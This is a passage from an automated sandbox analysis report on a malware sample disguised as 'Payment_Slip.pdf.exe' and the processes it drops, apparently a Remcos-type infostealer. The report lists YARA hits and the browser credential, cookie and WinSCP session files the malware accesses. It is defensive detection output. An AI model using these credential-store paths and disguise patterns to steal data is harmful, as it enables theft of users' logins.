                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeQueries volume information: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Users\user\AppData\Roaming\host.exe VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\host.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\conserver.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040A0B0 GetLocalTime,wsprintfW,11_2_0040A0B0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004195F8 GetUserNameW,11_2_004195F8
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_004466BF
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0041739B GetVersionExW,14_2_0041739B
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
                              Source: Yara matchFile source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040A953
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040A953
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040AA71
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: \key3.db11_2_0040AA71
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040AA71
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: \key3.db17_2_0040AA71
                              Source: C:\Users\user\AppData\Roaming\host.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
